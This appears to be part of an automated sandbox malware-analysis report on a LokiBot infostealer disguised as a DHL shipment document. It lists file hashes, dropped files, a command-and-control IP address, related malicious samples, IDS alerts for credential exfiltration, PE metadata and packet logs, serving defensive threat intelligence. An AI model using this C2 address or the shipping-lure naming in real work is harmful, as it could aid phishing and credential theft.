                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • HDC enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample file name:DHL_Express_Shipment_DOC.exe
                  Detection:MAL
                  Classification:mal100.troj.spyw.evad.winEXE@3/3@0/1
                  EGA Information:
                  • Successful, ratio: 100%
                  HDC Information:
                  • Successful, ratio: 97.9% (good quality ratio 93.9%)
                  • Quality average: 77%
                  • Quality standard deviation: 28.6%
                  HCA Information:
                  • Successful, ratio: 100%
                  • Number of executed functions: 35
                  • Number of non-executed functions: 5
                  Cookbook Comments:
                  • Found application associated with file extension: .exe
                  • Stop behavior analysis, all processes terminated

                  Warnings

                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, conhost.exe
                  • Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
                  • Not all processes where analyzed, report is missing behavior information
                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.

                  Simulations

                  Behavior and APIs

                  TimeTypeDescription
                  07:13:18API Interceptor4x Sleep call for process: DHL_Express_Shipment_DOC.exe modified

                  Joe Sandbox View / Context

                  IPs

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  64.227.48.212AWB#8457108962.exeGet hashmaliciousLokibotBrowse
                  • 64.227.48.212/?page_id=6303
                  Corporation_Statement.exeGet hashmaliciousLokibotBrowse
                  • 64.227.48.212/?page_id=6303
                  DHL_Shipment_Documents.exeGet hashmaliciousLokibotBrowse
                  • 64.227.48.212/?page_id=215360
                  DETTAGLI_SPEDIZIONE_TNT.exeGet hashmaliciousLokibotBrowse
                  • 64.227.48.212/?page_id=9693760
                  ylz7Y1lTksMhzko.exeGet hashmaliciousLokibotBrowse
                  • 64.227.48.212/?page_id=938859541697
                  Purchase_Inquiry.exeGet hashmaliciousLokibotBrowse
                  • 64.227.48.212/?page_id=14475287
                  RFQ6789034-INQUIRY.exeGet hashmaliciousLokibotBrowse
                  • 64.227.48.212/?page_id=6303

                  Domains

                  No context

                  ASNs

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  DIGITALOCEAN-ASNUShttps://go.surfaccounts.com/view/Init.aspx?965970e3-51a6-4e38-b1dc-f14b6d840139:1Get hashmaliciousUnknownBrowse
                  • 46.101.13.61
                  x86_64.elfGet hashmaliciousMirai, MoobotBrowse
                  • 157.230.1.108
                  6lqMB7o2Ts.elfGet hashmaliciousMirai, MoobotBrowse
                  • 157.230.191.4
                  8oxYPvmeaT.elfGet hashmaliciousMirai, MoobotBrowse
                  • 157.245.170.67
                  k8CCRUs7Yi.elfGet hashmaliciousMirai, MoobotBrowse
                  • 157.245.182.53
                  AWB#8457108962.exeGet hashmaliciousLokibotBrowse
                  • 64.227.48.212
                  VeTv7e9Dcz.elfGet hashmaliciousMirai, MoobotBrowse
                  • 157.245.169.42
                  XHZFo8hExw.elfGet hashmaliciousMirai, MoobotBrowse
                  • 157.245.211.186
                  99cb969e-5c61-4204-9902-f21da96b8e7a.exeGet hashmaliciousAmadeyBrowse
                  • 178.62.77.44
                  v8OWS3Ylfj.elfGet hashmaliciousMirai, MoobotBrowse
                  • 159.65.206.40
                  https://yu0rxkej.page.link/fMNhGet hashmaliciousGRQ ScamBrowse
                  • 198.211.98.91
                  kXf5n24SG6.elfGet hashmaliciousMirai, MoobotBrowse
                  • 157.245.182.64
                  https://rebrand.ly/1c050fGet hashmaliciousGRQ ScamBrowse
                  • 198.211.98.91
                  OeW6IrGTzH.elfGet hashmaliciousMirai, MoobotBrowse
                  • 157.230.24.170
                  malware.oneGet hashmaliciousEmotetBrowse
                  • 64.227.55.231
                  Office-AddInHelper.exeGet hashmaliciousAmadeyBrowse
                  • 142.93.229.91
                  Corporation_Statement.exeGet hashmaliciousLokibotBrowse
                  • 64.227.48.212
                  DHL_Shipment_Documents.exeGet hashmaliciousLokibotBrowse
                  • 64.227.48.212
                  8846_0.oneGet hashmaliciousEmotetBrowse
                  • 159.89.202.34
                  DETTAGLI_SPEDIZIONE_TNT.exeGet hashmaliciousLokibotBrowse
                  • 64.227.48.212

                  JA3 Fingerprints

                  No context

                  Dropped Files

                  No context

                  Created / dropped Files

                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\DHL_Express_Shipment_DOC.exe.log

                  Download File
                  Process:C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exe
                  File Type:ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):1216
                  Entropy (8bit):5.355304211458859
                  Encrypted:false
                  SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
                  MD5:FED34146BF2F2FA59DCF8702FCC8232E
                  SHA1:B03BFEA175989D989850CF06FE5E7BBF56EAA00A
                  SHA-256:123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
                  SHA-512:1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
                  Malicious:true
                  Reputation:high, very likely benign file
                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

                  C:\Users\user\AppData\Roaming\C79A3B\B52B3F.lck

                  Download File
                  Process:C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exe
                  File Type:very short file (no magic)
                  Category:dropped
                  Size (bytes):1
                  Entropy (8bit):0.0
                  Encrypted:false
                  SSDEEP:3:U:U
                  MD5:C4CA4238A0B923820DCC509A6F75849B
                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                  Malicious:false
                  Reputation:high, very likely benign file
                  Preview:1

                  C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3853321935-2125563209-4053062332-1002\bc49718863ee53e026d805ec372039e9_d06ed635-68f6-4e9a-955c-4899f5f57b9a

                  Download File
                  Process:C:\Users\user\Desktop\DHL_Express_Shipment_DOC.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):46
                  Entropy (8bit):1.0424600748477153
                  Encrypted:false
                  SSDEEP:3:/lbq:4
                  MD5:8CB7B7F28464C3FCBAE8A10C46204572
                  SHA1:767FE80969EC2E67F54CC1B6D383C76E7859E2DE
                  SHA-256:ED5E3DCEB0A1D68803745084985051C1ED41E11AC611DF8600B1A471F3752E96
                  SHA-512:9BA84225FDB6C0FD69AD99B69824EC5B8D2B8FD3BB4610576DB4AD79ADF381F7F82C4C9522EC89F7171907577FAF1B4E70B82364F516CF8BBFED99D2ADEA43AF
                  Malicious:false
                  Reputation:moderate, very likely benign file
                  Preview:........................................user.

                  Static File Info

                  General

                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                  Entropy (8bit):7.414207480565285
                  TrID:
                  • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                  • Win32 Executable (generic) a (10002005/4) 49.78%
                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                  • Win16/32 Executable Delphi generic (2074/23) 0.01%
                  • Generic Win/DOS Executable (2004/3) 0.01%
                  File name:DHL_Express_Shipment_DOC.exe
                  File size:852480
                  MD5:370ebdf4ff5036c106793994cc851779
                  SHA1:cc04ea26c1364b9a058b55c8697a49e1c7e16970
                  SHA256:1ebedb652fa27423240c3efa860e7551958811120737ee5d3ea7badf671fbacf
                  SHA512:63c2c4208a7d9c3c1176167f2c015c1a0bcb8b90cbb55cbb879aa93d0d7e0e128c1662273dfb73776c29466cf87c83f84be3acd48f871a125bc2189efafd3803
                  SSDEEP:12288:0wRZRbIx8nvRW3NVuf7sBF84DpHCojUzQO7auRJ0CXfmv5gn:02+xuv89V4gc4DVhhuRax
                  TLSH:F00507435EBB5085E8B70F38547A76980B34E953BDD9903B3CC9B61A8FFA68360463D1
                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...[..d..............0.................. ... ....@.. .......................`............@................................

                  File Icon

                  Icon Hash:00828e8e8686b000

                  Static PE Info

                  General

                  Entrypoint:0x4d16ae
                  Entrypoint Section:.text
                  Digitally signed:false
                  Imagebase:0x400000
                  Subsystem:windows gui
                  Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Time Stamp:0x6419125B [Tue Mar 21 02:11:39 2023 UTC]
                  TLS Callbacks:
                  CLR (.Net) Version:
                  OS Version Major:4
                  OS Version Minor:0
                  File Version Major:4
                  File Version Minor:0
                  Subsystem Version Major:4
                  Subsystem Version Minor:0
                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                  Entrypoint Preview

                  Instruction
                  jmp dword ptr [00402000h]
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al

                  Data Directories

                  NameVirtual AddressVirtual Size Is in Section
                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IMPORT0xd16600x4b.text
                  IMAGE_DIRECTORY_ENTRY_RESOURCE0xd20000x5d8.rsrc
                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                  IMAGE_DIRECTORY_ENTRY_BASERELOC0xd40000xc.reloc
                  IMAGE_DIRECTORY_ENTRY_DEBUG0xd161d0x1c.text
                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text

                  Sections

                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                  .text0x20000xcf6b40xcf800False0.7503800357680723data7.418461164070656IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  .rsrc0xd20000x5d80x600False0.4309895833333333data4.156248863214128IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  .reloc0xd40000xc0x200False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                  Resources

                  NameRVASizeTypeLanguageCountry
                  RT_VERSION0xd20a00x34cdata
                  RT_MANIFEST0xd23ec0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators

                  Imports

                  DLLImport
                  mscoree.dll_CorExeMain

                  Network Behavior

                  Snort IDS Alerts

                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                  192.168.2.464.227.48.21249700802024313 03/21/23-07:13:25.127064TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14970080192.168.2.464.227.48.212
                  192.168.2.464.227.48.21249698802021641 03/21/23-07:13:22.578656TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4969880192.168.2.464.227.48.212
                  192.168.2.464.227.48.21249699802024318 03/21/23-07:13:23.800015TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24969980192.168.2.464.227.48.212
                  192.168.2.464.227.48.21249698802024312 03/21/23-07:13:22.578656TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14969880192.168.2.464.227.48.212
                  192.168.2.464.227.48.21249700802024318 03/21/23-07:13:25.127064TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24970080192.168.2.464.227.48.212
                  192.168.2.464.227.48.21249699802021641 03/21/23-07:13:23.800015TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4969980192.168.2.464.227.48.212
                  192.168.2.464.227.48.21249701802021641 03/21/23-07:13:27.165442TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4970180192.168.2.464.227.48.212
                  192.168.2.464.227.48.21249701802024313 03/21/23-07:13:27.165442TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14970180192.168.2.464.227.48.212
                  192.168.2.464.227.48.21249698802024317 03/21/23-07:13:22.578656TCP2024317ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M24969880192.168.2.464.227.48.212
                  192.168.2.464.227.48.21249701802024318 03/21/23-07:13:27.165442TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24970180192.168.2.464.227.48.212
                  192.168.2.464.227.48.21249699802024313 03/21/23-07:13:23.800015TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14969980192.168.2.464.227.48.212
                  192.168.2.464.227.48.21249697802024317 03/21/23-07:13:21.229954TCP2024317ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M24969780192.168.2.464.227.48.212
                  192.168.2.464.227.48.21249702802024313 03/21/23-07:13:28.916498TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14970280192.168.2.464.227.48.212
                  192.168.2.464.227.48.21249702802021641 03/21/23-07:13:28.916498TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4970280192.168.2.464.227.48.212
                  192.168.2.464.227.48.21249702802024318 03/21/23-07:13:28.916498TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24970280192.168.2.464.227.48.212
                  192.168.2.464.227.48.21249697802021641 03/21/23-07:13:21.229954TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4969780192.168.2.464.227.48.212
                  192.168.2.464.227.48.21249700802021641 03/21/23-07:13:25.127064TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4970080192.168.2.464.227.48.212
                  192.168.2.464.227.48.21249697802024312 03/21/23-07:13:21.229954TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14969780192.168.2.464.227.48.212

                  Network Port Distribution

                  TCP Packets

                  TimestampSource PortDest PortSource IPDest IP
                  Mar 21, 2023 07:13:21.054405928 CET4969780192.168.2.464.227.48.212
                  Mar 21, 2023 07:13:21.223337889 CET804969764.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:21.223686934 CET4969780192.168.2.464.227.48.212
                  Mar 21, 2023 07:13:21.229954004 CET4969780192.168.2.464.227.48.212
                  Mar 21, 2023 07:13:21.398396015 CET804969764.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:21.398611069 CET4969780192.168.2.464.227.48.212
                  Mar 21, 2023 07:13:21.567040920 CET804969764.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:22.199431896 CET804969764.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:22.199486017 CET804969764.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:22.199523926 CET804969764.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:22.199561119 CET804969764.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:22.199584961 CET4969780192.168.2.464.227.48.212
                  Mar 21, 2023 07:13:22.199598074 CET804969764.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:22.199629068 CET4969780192.168.2.464.227.48.212
                  Mar 21, 2023 07:13:22.199635029 CET804969764.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:22.199664116 CET4969780192.168.2.464.227.48.212
                  Mar 21, 2023 07:13:22.199671984 CET804969764.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:22.199671984 CET4969780192.168.2.464.227.48.212
                  Mar 21, 2023 07:13:22.199696064 CET4969780192.168.2.464.227.48.212
                  Mar 21, 2023 07:13:22.199707031 CET804969764.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:22.199733973 CET4969780192.168.2.464.227.48.212
                  Mar 21, 2023 07:13:22.199743986 CET804969764.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:22.199749947 CET4969780192.168.2.464.227.48.212
                  Mar 21, 2023 07:13:22.199781895 CET804969764.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:22.199784994 CET4969780192.168.2.464.227.48.212
                  Mar 21, 2023 07:13:22.199821949 CET4969780192.168.2.464.227.48.212
                  Mar 21, 2023 07:13:22.368415117 CET804969764.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:22.368516922 CET804969764.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:22.368561983 CET4969780192.168.2.464.227.48.212
                  Mar 21, 2023 07:13:22.368576050 CET804969764.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:22.368594885 CET4969780192.168.2.464.227.48.212
                  Mar 21, 2023 07:13:22.368621111 CET4969780192.168.2.464.227.48.212
                  Mar 21, 2023 07:13:22.368626118 CET804969764.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:22.368668079 CET4969780192.168.2.464.227.48.212
                  Mar 21, 2023 07:13:22.405898094 CET4969880192.168.2.464.227.48.212
                  Mar 21, 2023 07:13:22.574153900 CET804969864.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:22.574321032 CET4969880192.168.2.464.227.48.212
                  Mar 21, 2023 07:13:22.578655958 CET4969880192.168.2.464.227.48.212
                  Mar 21, 2023 07:13:22.746587038 CET804969864.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:22.746746063 CET4969880192.168.2.464.227.48.212
                  Mar 21, 2023 07:13:22.914777040 CET804969864.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:23.510366917 CET804969864.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:23.510523081 CET804969864.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:23.510556936 CET804969864.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:23.510648012 CET804969864.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:23.510678053 CET804969864.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:23.510725021 CET804969864.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:23.510727882 CET4969880192.168.2.464.227.48.212
                  Mar 21, 2023 07:13:23.510778904 CET804969864.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:23.510790110 CET4969880192.168.2.464.227.48.212
                  Mar 21, 2023 07:13:23.510813951 CET804969864.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:23.510844946 CET804969864.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:23.510881901 CET804969864.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:23.510922909 CET4969880192.168.2.464.227.48.212
                  Mar 21, 2023 07:13:23.510998011 CET4969880192.168.2.464.227.48.212
                  Mar 21, 2023 07:13:23.629591942 CET4969980192.168.2.464.227.48.212
                  Mar 21, 2023 07:13:23.680857897 CET804969864.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:23.680969954 CET4969880192.168.2.464.227.48.212
                  Mar 21, 2023 07:13:23.680986881 CET804969864.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:23.681025982 CET804969864.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:23.681041956 CET4969880192.168.2.464.227.48.212
                  Mar 21, 2023 07:13:23.681066990 CET804969864.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:23.681080103 CET4969880192.168.2.464.227.48.212
                  Mar 21, 2023 07:13:23.681107998 CET804969864.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:23.681124926 CET4969880192.168.2.464.227.48.212
                  Mar 21, 2023 07:13:23.681175947 CET4969880192.168.2.464.227.48.212
                  Mar 21, 2023 07:13:23.797202110 CET804969964.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:23.797342062 CET4969980192.168.2.464.227.48.212
                  Mar 21, 2023 07:13:23.800014973 CET4969980192.168.2.464.227.48.212
                  Mar 21, 2023 07:13:23.967341900 CET804969964.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:23.967590094 CET4969980192.168.2.464.227.48.212
                  Mar 21, 2023 07:13:24.135057926 CET804969964.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:24.722923040 CET804969964.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:24.722959042 CET804969964.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:24.722980022 CET804969964.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:24.723011971 CET804969964.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:24.723036051 CET804969964.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:24.723062038 CET804969964.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:24.723079920 CET804969964.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:24.723099947 CET804969964.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:24.723121881 CET804969964.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:24.723145962 CET804969964.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:24.723330975 CET4969980192.168.2.464.227.48.212
                  Mar 21, 2023 07:13:24.723442078 CET4969980192.168.2.464.227.48.212
                  Mar 21, 2023 07:13:24.723543882 CET4969980192.168.2.464.227.48.212
                  Mar 21, 2023 07:13:24.890304089 CET804969964.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:24.890337944 CET804969964.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:24.890364885 CET804969964.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:24.890384912 CET4969980192.168.2.464.227.48.212
                  Mar 21, 2023 07:13:24.890391111 CET804969964.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:24.890398979 CET4969980192.168.2.464.227.48.212
                  Mar 21, 2023 07:13:24.890431881 CET4969980192.168.2.464.227.48.212
                  Mar 21, 2023 07:13:24.956021070 CET4970080192.168.2.464.227.48.212
                  Mar 21, 2023 07:13:25.124252081 CET804970064.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:25.124414921 CET4970080192.168.2.464.227.48.212
                  Mar 21, 2023 07:13:25.127063990 CET4970080192.168.2.464.227.48.212
                  Mar 21, 2023 07:13:25.295428038 CET804970064.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:25.296231985 CET4970080192.168.2.464.227.48.212
                  Mar 21, 2023 07:13:25.464880943 CET804970064.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:26.076277018 CET804970064.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:26.076349974 CET804970064.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:26.076397896 CET804970064.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:26.076426029 CET4970080192.168.2.464.227.48.212
                  Mar 21, 2023 07:13:26.076463938 CET804970064.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:26.076497078 CET4970080192.168.2.464.227.48.212
                  Mar 21, 2023 07:13:26.076508999 CET804970064.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:26.076514006 CET4970080192.168.2.464.227.48.212
                  Mar 21, 2023 07:13:26.076571941 CET804970064.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:26.076577902 CET4970080192.168.2.464.227.48.212
                  Mar 21, 2023 07:13:26.076627016 CET4970080192.168.2.464.227.48.212
                  Mar 21, 2023 07:13:26.076628923 CET804970064.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:26.076672077 CET804970064.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:26.076673031 CET4970080192.168.2.464.227.48.212
                  Mar 21, 2023 07:13:26.076713085 CET4970080192.168.2.464.227.48.212
                  Mar 21, 2023 07:13:26.076721907 CET804970064.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:26.076766014 CET4970080192.168.2.464.227.48.212
                  Mar 21, 2023 07:13:26.076788902 CET804970064.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:26.076828957 CET4970080192.168.2.464.227.48.212
                  Mar 21, 2023 07:13:26.244888067 CET804970064.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:26.244920015 CET804970064.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:26.244941950 CET804970064.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:26.244962931 CET804970064.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:26.244961977 CET4970080192.168.2.464.227.48.212
                  Mar 21, 2023 07:13:26.244990110 CET4970080192.168.2.464.227.48.212
                  Mar 21, 2023 07:13:26.245038986 CET4970080192.168.2.464.227.48.212
                  Mar 21, 2023 07:13:26.724775076 CET4970180192.168.2.464.227.48.212
                  Mar 21, 2023 07:13:26.892939091 CET804970164.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:26.893163919 CET4970180192.168.2.464.227.48.212
                  Mar 21, 2023 07:13:27.165441990 CET4970180192.168.2.464.227.48.212
                  Mar 21, 2023 07:13:27.333664894 CET804970164.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:27.333852053 CET4970180192.168.2.464.227.48.212
                  Mar 21, 2023 07:13:27.501837015 CET804970164.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:28.111509085 CET804970164.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:28.111579895 CET804970164.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:28.111625910 CET804970164.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:28.111692905 CET804970164.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:28.111742020 CET804970164.227.48.212192.168.2.4
                  Mar 21, 2023 07:13:28.111743927 CET4970180192.168.2.464.227.48.212
